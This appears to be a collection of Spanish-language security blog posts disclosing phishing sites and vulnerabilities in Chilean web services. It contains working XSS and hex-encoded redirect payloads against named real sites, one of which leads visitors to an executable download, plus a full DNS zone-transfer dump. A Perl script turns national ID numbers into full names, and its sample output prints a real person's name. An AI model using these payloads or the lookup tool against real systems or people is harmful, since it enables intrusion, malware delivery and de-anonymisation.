[Phishing] Banco de Chile .-

Hoy me llegó un correo de "Banco Chile", como no tengo cuenta ahí fue sospechoso de inmediato, sin embargo llego a INBOX sin mayor problemas de mi cuenta de Hotmail, y a simple vista parecía ser un correo bastante normal, a excepción del tipo de enlaces que traía y el dominio de donde venia el correo (ci).

Correo recibido:

Contenido:

El correo te envía a la dirección:   http://migrupo.net/images/wp-include.php
Que te redirecciona a :  http://174.136.32.67/~pruebaqd/enlinea/ en primera instancia y luego nuevamente a distintas  variaciones de login como:

http://174.136.32.67/~pruebaqd/enlinea/Process.php
http://174.136.32.67/~pruebaqd/enlinea/User.php
http://174.136.32.67/~pruebaqd/enlinea/login.php
http://174.136.32.67/~pruebaqd/enlinea/entrar.php
http://174.136.32.67/~pruebaqd/enlinea/user.php
http://174.136.32.67/~pruebaqd/enlinea/contact.php
http://174.136.32.67/~pruebaqd/enlinea/enter.php

Denunciado, saludos

[Warwalking && Wififofum app ]

Wififofum: Es una aplicación que escanea redes wifi 802.11 y recopila información desde ellas como: SSID, MAC, RSSI channel y el tipo de seguridad que posee.Nos muestra un radar con las redes cercanas y lo mejor de la aplicación es que usando el gps del equipo ( en mi caso ; iphone)podemos llevar un registro con información y geolocalizacion de la red escaneada y ser guardado en un archivo KML. Posteriormente el archivo KML lo podemos procesar gracias a Google Earth y obtener una mapa con las redes.

Iphone/cydia:

Aplicación:

Niños Expuestos - Grooming en la red

Hace un tiempo vengo investigando y recolectando casos reales , muchas veces haciéndome pasar como un nin@ , y ver a que estaría expuesto uno de verdad con el solo hecho de entrar a una sala de chat inocentemente.

Pero , ¿Qué es el Grooming?

- Yo lo defino como realizar acciones deliberada y conscientemente por un adulto con el fin de acercarse a un menor, ganarse su confianza y amistad, crear un vinculo, quitar las inhibiciones a un niño, distorsionar el sentido de realidad de lo que esta bien ,finalizando con un abuso sexual.

Se deben tener en cuenta que es un proceso, planificado y preparado. El adulto toma tiempo en ganarse la confianza con diversos métodos y estrategias, es paciente y espera, una acción muy rápida podría asustar al menor y perdería control sobre el.

SERVEL y los Metadatos.

Los metadatos son datos que definen o describen otra pieza de información. Por sí mismos no son maliciosos, pero pueden revelar más de lo que piensas sobre ti, tu organización o tus dispositivos. Muchos dispositivos, como las computadoras, las cámaras o los smartphones, incrustan automáticamente metadatos en cualquier archivo digital que produzcan. Además, la mayoría de los
programas de software o formatos de archivo incluyen marcadores de posición para tipos específicos de metadatos. Un ejemplo muy común es Microsoft Word, el cual por default incluye información acerca del autor, la fecha de creación del documento y cualquier comentario o revisión incrustada.

Algunos ejemplos de metadatos son

• Fecha y hora de creación del archivo
• La dirección o la ubicación geográfica de dónde fue creado el archivo
• Tu nombre, el nombre de tu organización, el nombre de tu máquina o dirección IP
• Los nombres de cualquier persona que haya contribuido con el documento o los comentarios
que insertaron
• El tipo de cámara utilizada y sus configuraciones al momento de tomar la foto.
• Tipo de dispositivo de audio o video usado y las configuraciones establecidas al realizar una
grabación
• Marca, modelo y proveedor de servicios de tu teléfono inteligente. (fuente)

Sitio Web de la JUNJI con Enlaces Porno.+

La Junta Nacional de Jardines Infantiles (JUNJI)

Si bien esto es algo no muy inusual, lo hago publico para que así arreglen el problema, resulta que al estar navegando, salto esto a la vista y al revisarlo estaban presente, en el source de las paginas de http://www.junji.gob.cl  enlaces relacionados con lo que seria pornografía , incluso otros sitios sin contenido pornográfico que podrían quizás estar siendo utilizados para infectar o simplemente generar visitas.

Source:

El primer sitio ( turco ) :

Segundo Sitio Porn:

Go!

[Recuerdos] Mi primer Modding .

Bueno estaba viendo unas fotos y me encontré con esto, mi primer modding , recuerdo que me costo mucho tomar la decision de entrar a picar, ya que era una tapa totalmente de aluminio y bastante atractivo y sobrio el gabinete.

La cosa es que con una dremmel e imaginacion llegue a esto:

[Perl] ARP-Spoofer - t00l ~~

Bueno no explicare para que sirve esta herramienta ya que esta bastante tocado el tema, pero es algo que me ahorra bastante tiempo cuando me pongo a jugar realizando Mitm , más la utilizacion de Wireshark
Sé que hay modulos especializados en esto, pero queria hacerlo asi nomas a mano.

Lo que haces es:

 [+] Buscar ips activas gracias a NMAP

 [+]Revisar y cambiar el valor de /proc/sys/net/ipv4/ip_forward para redireccionar el trafico.

 [+]Falsear la tabla ARP , una vez detenido el script vuleve los valores a la normalidad.

[Perl] rutfinder.pl || Buscador de RUT en Sitio SII [ServicioImpuestosInternos]

Este es un Pequeño script para encontrar el Nombre completo de una persona utilizando un RUT ,utiliza la base de datos del Servicio de Impuestos Internos para hacer el Match, Por lo que las personas que hayan iniciado actividades forman parte de estos resultados.



 rutfinder.pl

#!/usr/bin/perl 

#Coded by shine  blog.xshinee.cl                                   
#Consulta rut en la base de datos del SII
#Se ingresa el rut asi 00000000 0

use LWP::UserAgent;
use strict;

system(clear);

if (!$ARGV[0] || !$ARGV[1]) {

&BANNER();
exit 1;

}


my $rut = $ARGV[0];
my $dv = $ARGV[1];
my $answer;
my $sitio = "https://zeus.sii.cl/cvc_cgi/stc/getstc?RUT=$rut&DV=$dv&ACEPTAR=Efectuar+Consulta&PRG=STC&OPC=NOR";

my $buscador = LWP::UserAgent->new() or die;
my $busqueda = $buscador ->get($sitio) or die;

$busqueda ->content() =~ m#<td align="left" width="450"><font class="texto">(.*)</font></td>#ig;
my $answer = $1;

if ($answer =~  /^[A-Za-z+][\s[A-Za-z]+]*$/ ) {

&BANNER2();
print "\nResultado: $answer\n\n";
} else {
&BANNER2();
print "[X] El rut no se encuentra en los registros\n\n"; }


sub BANNER(){
print q(
[###############################
     Rut en SII
  ____ ___ ___ 
 / ___|_ _|_ _|
 \___ \| | | | 
  ___| | | | | 
 |____/___|___|
               


Su uso es asi: rut dv
ejemplo:rutfinder.pl 12345679 0
################################
);
}

sub BANNER2(){
print q(
[############################
    
  ____ ___ ___ 
 / ___|_ _|_ _|
 \___ \| | | | 
  ___| | | | | 
 |____/___|___|
               
Data Rut Finder
Servicio Impuestos Internos
Chile

############################
);
}

Ejemplo con un Rut al azar (Google):

shinee@Wafles:~/Documentos$ perl no.pl 14065066 8

Salida:

[############################
    
  ____ ___ ___ 
 / ___|_ _|_ _|
 \___ \| | | | 
  ___| | | | | 
 |____/___|___|
               
Data Rut Finder
Servicio Impuestos Internos
Chile

############################

Resultado: GLADYS ALEJANDRA SAGREDO MUNOZ

DataLeak -Comprobantes de pago PlacasPatente/Dueño [Insico.cl] Caso: Municipalidad Antofagasta

Insico:  Es una empresa de soluciones informáticas o como ellos mismo se definen en su pagina:

"Somos una empresa de tecnologías de la información e integración de sistemas, especializada en otorgar soluciones informáticas integrales a empresas y organismos del Sector Público, con clientes en gran parte del territorio nacional. En más de 30 años de existencia, hemos adquirido sólidos conocimientos y una vasta experiencia en la administración de instituciones gubernamentales, lo que nos permite comprender profundamente las necesidades de cada cliente y ofrecer soluciones maduras y confiables, usando en cada ocasión las tecnologías mas adecuadas. Nos hemos propuesto como un objetivo básico, que todos los recursos de INSICO se orienten a "ponerse en el lugar de nuestros clientes" asumiendo sus necesidades como propias. Lo anterior determina que, como eje fundacional, se hayan establecido valores declarados y permanentes: INTEGRIDAD, TRABAJO EN EQUIPO Y VOCACION DE SERVICIO, los que definen el carácter de la empresa, guían sus acciones y sirven de marco de referencia en las decisiones que se toman al interior de la organización, con sus clientes y proveedores. En la constante búsqueda de la excelencia, en el año 2008 asumimos el firme compromiso de que nuestro propósito de mejora continua fuese verificado por entidades externas y certificamos nuestro Sistema de Gestión de Calidad, basado en la norma ISO 9001:2000, con Bureau Veritas (BVQi), empresa líder en certificación, el que hemos mantenido hasta la fecha y actualizado a su versión ISO 9001:2008."

Dentro de sus clientes se encuentran bastante municipalidades, en este caso nos fijaremos en el servicio que prestan como portal de pagos para permisos de circulacion para ciertas  municipalidades de forma online ( este servicio se encuentra disponible y actualmente es usado) abarcando  un gran numero de transacciones y su posterior generación del comprobante.

En este caso me centrare en el sitio: http://permisosima.insico.cl/ que corresponde al portal de pagos para la Ilustre Municipalidad de Antofagasta.

Fckeditor everywhere + AhMeBa CMS shell upload vulnerabilty

La verdad la vulnerabilidad shell upload/arbitrary File upload  que esta asociada a Fckeditor es bastante antigua y conocida. Pero no por esto no sigue activa y dando vueltas por ahi , la verdad basta con dorkear muchas veces para darse cuenta que se puede encontrar con rapidez. Más aun exploits para subir shells por distintos métodos ya son parte de los muchos resultados al buscar en google. -> exploit-db.com


Pero aún sabiendo esto: ocurre lo siguiente:

+Sitios siguen mantieniendo libre acceso a la ruta completa de facil acceso ya que se puede navegar por sus directorios y finalmente es cosa de un par de clicks el llegar a destino.

+ Sitios mantienen libre acceso a la ruta final, "complicando" un poco más las cosas ya que no se puede navegar por sus directorios, pero es cosa de dar con la ruta ya que lo que varia según el sitio es el comienzo nada mas de la ruta no asi lo demas que se mantiene Casi invariable.

FPD & Cross-site Scripting en Sitio E-Sign .

Como muchos deben saber la Empresa E-sign es a representante de Verisign en chile, esta empresa dentro de los variados servicio que ofrece es bastante conocida por ofrecer servicio de seguridad informatica, seguridad de la informacion, certificados digitales , nivel web, consultorias y mas.

En este caso se trata de un XSS dentro de su sitio, que ademas podriamos aprovechar su confianza al estar con SSL .

El xss se ubica en:  https://www.e-sign.cl/Enrolamiento/FormularioEnrolamientoNS.php?IDP=CSC"'><script>alert(/XSS/)</script>

Ademas existe la posibilidad de insertar un iframe y con un poco de imaginacion e ingeria social podriamos encontrar una forma efectiva efectiva de explotarlo.

SS del XSS:

La gracia de este XSS, es abusar de la confianza que nos ofrece estar en presencia de un certificado, y la tranquilidad con la que una posible victima podria ser objeto de engaño.

Finalmente al generar el erro, nos emite además el full path con la ruta: D:\www\www\www.e-sign.cl\Enrolamiento\lib/xml/CSC

# En casa de herrero, cuchillo de palo.

IDs.secureless:  #2311  #2312

Esto fue reportado a e-sign obteniendo una buena respuesta, pero jamás fue hecho el fix.

Phishing Banco de Chile / Email spoofing + phishing site

Hoy al revisar mi correo, me percate que me llego un email al inbox de mi cuenta en hotmail, con el remitente:

Banco de Chile (serviciodetransferencias@bancochile.cl), 

algo extraño para mi ya que no poseo cuenta en dicho banco. Veamos la apariencia del contenido del mensaje.

La verdad a simple vista es bastante realista, el motivo del correo es por "razones de seguridad", donde dice que es necesario confirmar un ceular y observamos que todas las imagenes y links apuntan al sitio:

http://trendities.com/wp-includes/js/jcrop/ , sitio que nos redirecciona automaticamente a donde se encuentra el sitio fraudulento : 

http://tslpdx.org/Dir/ww3.bancochile.cl

---------------------------------------------------------------

Volviendo al tema del remitente: serviciodetransferencias@bancochile.cl

es bastante extraño y podriamos suponer un email spoofing veamos el source del correo:

---------------------------------------------------------------------------------------

x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensxNRGNyaWNye2KGQMBL0mDAyfsLk47KxnCeC5gevrzet+jPjTzcwCjyfOYkAjKVEfGj8orz6lRlSAnMquNhlXj4NLjCu9QX9DkyOZnFRQbMQ=
Authentication-Results: hotmail.com; sender-id=temperror 
(sender IP is 85.114.133.90) 

header.from=serviciodetransferencias@bancochile.cl; dkim=none header.d=bancochile.cl; x-hmca=none
X-SID-PRA: serviciodetransferencias@bancochile.cl
X-SID-Result: TempError
X-DKIM-Result: None
X-Message-Status: n:0:n
X-AUTH-Result: NONE
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0xO0Q9MTtHRD0xO1NDTD0y
X-Message-Info: aKlYzGSc+Lm+Zf+AatNrv8l3z1l4w8fZKNzDhsgC15ic+xR7MztIHsgQfBDGgfWr6t9Etwmz7OYhYMm3BZb5XCESBUj0UlSMi5y0cKI633RYJDiUPSH4Cc4y5F/T3xNZGT4ftS+wlAFUgf/kypZJvA==
Received: from rotzleffl.de ([85.114.133.90]) by COL0-MC4-F45.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
  Thu, 9 Aug 2012 08:11:36 -0700
Received: by rotzleffl.de (Postfix, from userid 65534)
 id 5BE6E72A1CD; Thu,  9 Aug 2012 17:07:04 +0200 (CEST)
To: MICORREO@hotmail.com
Subject: Ingrese a su Cuenta Nuevos servicios
From: Banco de Chile <serviciodetransferencias@bancochile.cl>
Reply-To: 
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
X-Priority: 1
X-MSMail-Priority: High
Content-Transfer-Encoding: 8bit
X-Mailer: My mailer
Message-Id: <20120809150709.5BE6E72A1CD@rotzleffl.de>
Date: Thu,  9 Aug 2012 17:07:04 +0200 (CEST)
Return-Path: nobody@de
X-OriginalArrivalTime: 09 Aug 2012 15:11:37.0320 (UTC) FILETIME=[456AEE80:01CD7641

----------------------------------------------------------------------------------

Email Spoofing:

La Sender IP (85.114.133.90): resuelve  el sitio  rotzleffl.de

que corresponde al siguiente sitio

Otra parte del contenido que me llamo la atencion fue el 

"by COL0-MC4-F45.Col0.hotmail.com" , y con la ayuda de San Google

nos damos cuenta que cada resultado de la busqueda tiene relaciones 

con phishing scams spam y sitios fraudulentos.

----------------------------------------------------------- 

Siguiendo con el sitio al cual fuimos direccionados:

http://tslpdx.org/Dir/ww3.bancochile.cl 

Nos encontramos con el sitio fraudulento:

El sitio fraudulento nos redirecciona nuevamente al pasar un par 

de segundos a:

http://tslpdx.org/Dir/BancoChile/enter.php

http://tslpdx.org/Dir/BancoChile/contact.php

http://tslpdx.org/Dir/BancoChile/Process.php

http://tslpdx.org/Dir/BancoChile/login.php

http://tslpdx.org/Dir/BancoChile/entrar.php

http://tslpdx.org/Dir/BancoChile/user.php

http://tslpdx.org/Dir/BancoChile/actualizar.php 

Aleatoriamente cada vez que somos redireccionados nuevamente 

desde http://tslpdx.org/Dir/ww3.bancochile.cl 

al realizar otro request al mismo sitio.

Saludos. 

Transferencia de Zona Abierta (AXFR) - Universidad Antofagasta

AXFR:

Def: Las siglas AXFR hace referencia a la transferencia por zonas de un DNS primario a un DNS secundario o de un DNS primario a un server maestro y de un server maestro a un DNS secundario, si llegara a existir algún problema de configuración o actualización del software de cualquiera de estos servidores se podrían explotar una serie de vulnerabilidades como por ejemplo un DoS y la integridad y confidencialidad de la base de datos del DNS primario se verían comprometidas, se estima que alrededor de un 60% de los servidores DNS en internet son vulnerables.
(http://es.wikipedia.org/wiki/AXFR)

Buscando en los sitios locales, pude dar con un AXFR que afecta a la Universidad De Antofagasta.

Dominio: http://www.uantof.cl
DNS Asociados: ns.uantof.cl 
               secundario.nic.cl
++
Afectado: @ns.uantof.cl
---------------------------------------------------------------

; <<>> DiG 9.7.0-P1 <<>> AXFR uantof.cl @ns.uantof.cl
;; global options: +cmd
uantof.cl.              3600    IN      SOA     ns.uantof.cl. admin.uantof.cl. 2006062147 900 600 86400 3600
uantof.cl.              3600    IN      NS      ns.uantof.cl.
uantof.cl.              3600    IN      NS      secundario.nic.cl.
uantof.cl.              3600    IN      MX      10 mx.tie.cl.
uantof.cl.              3600    IN      TXT     "google-site-verification=m6e__NzmUPTP14OWlfcoG5Fh3kARbB3WEKwJmf2kfnY"
adecca.uantof.cl.       3600    IN      A       200.54.114.231
ftp.adecca.uantof.cl.   3600    IN      CNAME   adecca.uantof.cl.
www.adecca.uantof.cl.   3600    IN      CNAME   adecca.uantof.cl.
archivos.uantof.cl.     3600    IN      A       64.76.162.206
archivos1.uantof.cl.    3600    IN      A       200.91.27.74
archivos2.uantof.cl.    3600    IN      A       200.91.27.75
archivos3.uantof.cl.    3600    IN      A       200.91.27.233
astro.uantof.cl.        3600    IN      A       200.54.114.142
www.astro.uantof.cl.    3600    IN      CNAME   astro.uantof.cl.
aulavirtual.uantof.cl.  3600    IN      A       200.54.114.104
www.aulavirtual.uantof.cl. 3600 IN      CNAME   aulavirtual.uantof.cl.
biblionline.uantof.cl.  3600    IN      A       200.54.114.56
biblioteca.uantof.cl.   3600    IN      CNAME   hornitos.uantof.cl.
boreas.uantof.cl.       3600    IN      A       200.54.114.109
www.boreas.uantof.cl.   3600    IN      CNAME   boreas.uantof.cl.
cienciasbasicas.uantof.cl. 3600 IN      A       200.54.114.132
www.cienciasbasicas.uantof.cl. 3600 IN  CNAME   cienciasbasicas.uantof.cl.
dirinv.uantof.cl.       3600    IN      A       200.54.114.134
edelfos.uantof.cl.      3600    IN      CNAME   hornitos.uantof.cl.
www.edelfos.uantof.cl.  3600    IN      CNAME   edelfos.uantof.cl.
egresadosmedicina.uantof.cl. 3600 IN    A       200.54.114.88
www.empleos.uantof.cl.  3600    IN      A       200.29.145.50
enlaces.uantof.cl.      3600    IN      A       200.54.114.231
www.enlaces.uantof.cl.  3600    IN      CNAME   enlaces.uantof.cl.
faciba.uantof.cl.       3600    IN      A       200.54.114.77
ftp.uantof.cl.          3600    IN      A       200.54.114.87
gis.uantof.cl.          3600    IN      CNAME   boreas.uantof.cl.
hornitos.uantof.cl.     3600    IN      A       200.54.114.52
ictiologia.uantof.cl.   3600    IN      A       200.27.127.209
idelfos.uantof.cl.      3600    IN      A       200.54.114.82
www.idelfos.uantof.cl.  3600    IN      CNAME   idelfos.uantof.cl.
imagenes.uantof.cl.     3600    IN      A       200.54.114.52
imap.uantof.cl.         3600    IN      A       200.91.27.67
ingen.uantof.cl.        3600    IN      A       200.27.127.205
siafi.ingen.uantof.cl.  3600    IN      A       200.27.127.60
www.ingen.uantof.cl.    3600    IN      CNAME   ingen.uantof.cl.
intranet.uantof.cl.     3600    IN      A       146.83.113.8
www.intranet.uantof.cl. 3600    IN      CNAME   intranet.uantof.cl.
inventarioictiologico.uantof.cl. 3600 IN A      200.54.114.95
www.inventarioictiologico.uantof.cl. 3600 IN CNAME inventarioictiologico.uantof.cl.
investigacion.uantof.cl. 3600   IN      A       200.54.114.134
www.investigacion.uantof.cl. 3600 IN    CNAME   investigacion.uantof.cl.
labmatem.uantof.cl.     3600    IN      A       200.54.114.61
ftp.labmatem.uantof.cl. 3600    IN      CNAME   labmatem.uantof.cl.
www.labmatem.uantof.cl. 3600    IN      CNAME   labmatem.uantof.cl.
laboratorioremoto.uantof.cl. 3600 IN    A       200.54.114.59
mail.uantof.cl.         3600    IN      CNAME   mta.uantof.cl.
mas.uantof.cl.          3600    IN      CNAME   ns.uantof.cl.
moodle.uantof.cl.       3600    IN      A       200.54.114.89
www.moodle.uantof.cl.   3600    IN      CNAME   moodle.uantof.cl.
mta.uantof.cl.          3600    IN      A       200.91.27.31
ns.uantof.cl.           3600    IN      A       200.54.114.229
pop3.uantof.cl.         3600    IN      A       200.91.27.67
portafolio.uantof.cl.   3600    IN      A       200.54.114.235
www.portafolio.uantof.cl. 3600  IN      CNAME   portafolio.uantof.cl.
prensa.uantof.cl.       3600    IN      CNAME   www.uantof.cl.
radio.uantof.cl.        3600    IN      A       200.54.114.230
www.radio.uantof.cl.    3600    IN      CNAME   radio.uantof.cl.
reportes.uantof.cl.     3600    IN      A       200.54.114.83
www.reportes.uantof.cl. 3600    IN      CNAME   reportes.uantof.cl.
simbad2.uantof.cl.      3600    IN      A       200.54.114.226
ftp.simbad2.uantof.cl.  3600    IN      CNAME   simbad2.uantof.cl.
www.simbad2.uantof.cl.  3600    IN      CNAME   simbad2.uantof.cl.
smtp.uantof.cl.         3600    IN      A       200.91.27.66
soporte.uantof.cl.      3600    IN      A       146.83.139.241
tvreuna.uantof.cl.      3600    IN      A       200.27.127.254
angamos.vista.uantof.cl. 3600   IN      A       200.27.127.100
webmail.uantof.cl.      3600    IN      A       200.91.27.70
www.webmail.uantof.cl.  3600    IN      CNAME   webmail.uantof.cl.
webpay.uantof.cl.       3600    IN      CNAME   ns.uantof.cl.
www.uantof.cl.          3600    IN      CNAME   simbad2.uantof.cl.
-------------------------------------------------------------------------------------------------------------------------------

AXFR con exito: Quedando en evidencia subdominios asociados.
Reporte en tramite?

Tomando ventaja de Cross-site scripting para 'Infectar'

En varias ocasiones en las cuales reportamos algunos Cross-site scripting, las soluciones mas rápidas son evitar el uso de la etiqueta <script> o bien filtrar la inyeccion de codigo Javascript, pero y ¿que pasa con las etiquetas html?, la verdad muchas veces nos escontramos que no fueron fixeadas y siguen presentes para poder inyectar codigo. En esta prueba utilizare 2 sitios bastante conocidos y aprovechare el no filtrado de etiquetas Html para "infectar" un visitante.

Primer caso:

Sitio: www.ripley.cl  , el xss fue reportado hace mucho tiempo, aun asi permite el uso de una etiqueta html que nos permite redireccionar hacia un sitio arbitrariamente. Para la prueba he subido un .exe SIN contenido solo como prueba de concepto a un host.

Al entrar al sitio principal de RIPLEY, no redirige automáticamente a http://www.ripley.cl/webapp/wcs/stores/servlet/StoreCatalogDisplay?storeId=10051&catalogId=100516
, es la variable catalogId la que nos permite el uso de esta etiqueta.

La Url la dejamos de la forma siguiente con un poco de Hexa redireccionando al sitio con el .exe:

http://www.ripley.cl/webapp/wcs/stores/servlet/StoreCatalogDisplay?storeId=10051&catalogId=10051%27%22%3e%3c%6d%65%74%61%20%68%74%74%70%2d%65%71%75%69%76%3d%22%52%65%66%72%65%73%68%22%20%63%6f%6e%74%65%6e%74%3d%22%30%3b%75%72%6c%3d%68%74%74%70%73%3a%2f%2f%77%77%77%2e%64%72%69%76%65%68%71%2e%63%6f%6d%2f%66%69%6c%65%2f%44%46%50%75%62%6c%69%73%68%46%69%6c%65%2e%61%73%70%78%2f%46%69%6c%65%49%44%31%30%39%34%31%30%39%38%36%37%2f%4b%65%79%72%77%69%36%61%63%78%6c%67%33%61%64%2f%70%6f%63%2e%65%78%65%22%3e

Obteniendo lo siguiente:

Segundo caso:

Sitio: http://www.Tesoreria.cl

El Cross-site Scripting fue reportado a Secureless mediante el ID : #2258
y afecta la variable 'idn' . Realizamos el mismo procedimiento y obtenemos.


http://www.tesoreria.cl/web/noticias/verDetalle.do?idn=4126%27%22%3e%3c%6d%65%74%61%20%68%74%74%70%2d%65%71%75%69%76%3d%22%52%65%66%72%65%73%68%22%20%63%6f%6e%74%65%6e%74%3d%22%30%3b%75%72%6c%3d%68%74%74%70%73%3a%2f%2f%77%77%77%2e%64%72%69%76%65%68%71%2e%63%6f%6d%2f%66%69%6c%65%2f%44%46%50%75%62%6c%69%73%68%46%69%6c%65%2e%61%73%70%78%2f%46%69%6c%65%49%44%31%30%39%34%31%30%39%38%36%37%2f%4b%65%79%72%77%69%36%61%63%78%6c%67%33%61%64%2f%70%6f%63%2e%65%78%65%22%3e 

Obtenemos lo siguiente:

Está claro que podemos tomar ventajas del Xss, ya no basta como decian antes verificar el comienzo de la Url, aun mas podriamos utilizar un acortador de url y seria aun mas efectivo.

Imaginemos un ataque mas completo en el caso de Ripley:

Mediante el uso de  Mail Spoofing enviamos propaganda de la tienda con una promocion llamativa o con un premio tentador, desde un remitente bastante creible que no levante sospechas
Incluimos un link con raiz http://www.ripley.cl que redireccione , a distintas opciones, puede ser:

- La descarga de malware
- A un sitio con malware
- Descarga de un .exe para obtener un session meterpreter.
- Redirrecionar a un sitio con publicidad
- Asociar con metasploit para obtener una sesion meterpreter via Uripath

Lo que se les pudiera ocurrir. Un usuario promedio podria caer facilmente en un "ataque" como este sin mayor preocupacion, y ¿Cual fue el origen? , bueno el Cross-site scripting en el sitio.


Saludos:

PD: El sitio de Ripley de reportado hace meses, y la inyeccion de Javascript al parecer fue corregida no asi la utilizacion de esta etiqueta html, en el caso de Tesoreria.cl esta reportado a Secureless como mencione anteriormente por algun usuario, no se la existencia de un reporte directo, emitire uno de todas maneras.
PD2: EL .exe utilizado en esta prueba no contiene ningun tipo de malware, consiste nada mas que en un archivo vacio en formato .exe.

Phishing - Banco Ripley

En un comentario de un Post anterior me señalaron lo que parecia ser un Phishing que tiene como objetivo engañar a clientes del Banco Ripley.

La sitio es el siguiente:  http://soportenlinea.16mb.com/bancoripley/banco_ripley/index.html

Bastante poco real la verdad, es la sumatoria de imagenes, a excepcion del 'login', no asi el sitio real  http://www.bancoripley.cl/ .


Saludos

[xss] en ChileAtiende #2

Anteriormente había reportado unos xss , los cuales fueron fixeados
Ahora se ve afectado el buscador nuevamente pero por un subdominio.

El xss: http://buscador.chileatiende.cl/buscador/consulta?q='"><script>alert(%2FXSS%2F)<%2Fscript>&filtro=

Saludos, reportado via twitter.

Page Source: Subsecretaria de Transportes -Chile

Hoy navegaba por el sitio http://www.subtrans.gob.cl Subsecretaria de Transportes - Chile y de un momento a otro me di cuenta que habia un link que no resaltaba a la vista pero estaba ahi, obviamente no correspondia a un sitio original de la pagina sino que alguien lo habia puesto ahi. Fijemonos en el titulo del link y esto nos aclarara a razon.

En teoria podriamos decir que estamos presencia de Clickjacking ya que al hacer click en un lugar "vacio" estariamos siendo redireccionados al sitio  http://www.append-h.com , vacio entrecomillas porque en verdad solo esta del mismo color del fondo.

Para recolectar mas informacion del sitio busque en virus total si habia algun analisis y realice uno:  https://www.virustotal.com/url/77970e35cb3d165862cfefcfff6883569b269f9cb2ecf7fc35a14c3538fc2192/analysis/

+Bit defender fue el unico que lo catagorizo como: Malware Site

Saludos.

Phishing Banco BBVA - Chile

Ultimamente he publicado varios sitios fraudulentos de phishing para bancos de Chile, esta vez lo toco a el Banco BBVA.

El sitio que aloja estas paginas fraudulentas es:

http://hondaowners.co.za

Sitios Fraudulentos:

http://hondaowners.co.za/update/old/includes/acp/include/

http://hondaowners.co.za/update/old/includes/acp/include/index.php?STP=login

Saludos.

Nuevamente: Phishing Banco Santander - Chile

La verdad con esta es la tercera vez creo que publico un sitio alojando paginas fraudulentas para phishing Banco Santander - Chile.

Lo que llama la atencion esta vez es que le toco a un sitio Gubernamental de Mexico, no es tan extraño ya que debido a alguna vulnerabilidad en el sitio mismo los delincuentes toman acceso a ella pudiendo subir y administrar contenidos a gusto.

El sitio en cuestion es:

http://www.tacotalpa.gob.mx

Nos dirigimos al directorio   ../1/view.asp_files/

Aqui en donde se alojan los sitios fraudulentos:

error.htm

vsBs.html

vsMs.html

vsTs.html

Screenshots:

http://www.tacotalpa.gob.mx/1/view.asp_files/vsMS.html
Despues de una ventana que explica el porque piden las claves salta esta tipica pantalla fraudulenta.

Saludos @Shinee_
Pd: Si bien los archivos son del año 2010 siguen ahi, pudiendo causar daños a los usuarios.

Clickjacking & TaringaMusica.com

ClickJacking & TanringaMusica.com

El dia de ayer navegaba por este sitio cuando derrepente creo que al hacer click en un espacio "sin elemento" me aparecio el siguiente aviso de NoScript.

Un potencial clickjacking me ha detectado NoScript, la direccion me apunta a facebook.com y lo seguire para ver que sucede, pero antes veamos esto:

*Observemos que el puntero esta en una zona en blanco, pero abajo en la base de la ventana podemos darnos cuenta que nos esta linkeando a un 'like.php?href" de Facebook, pero veamos de que..

Los responsables de esto son estos dos archivos:

like.js 

Config.js

Vemos que todo el fondo del sitio queda afectado al secuestro de click.

Saludos, que no secuestren tus clicks 8)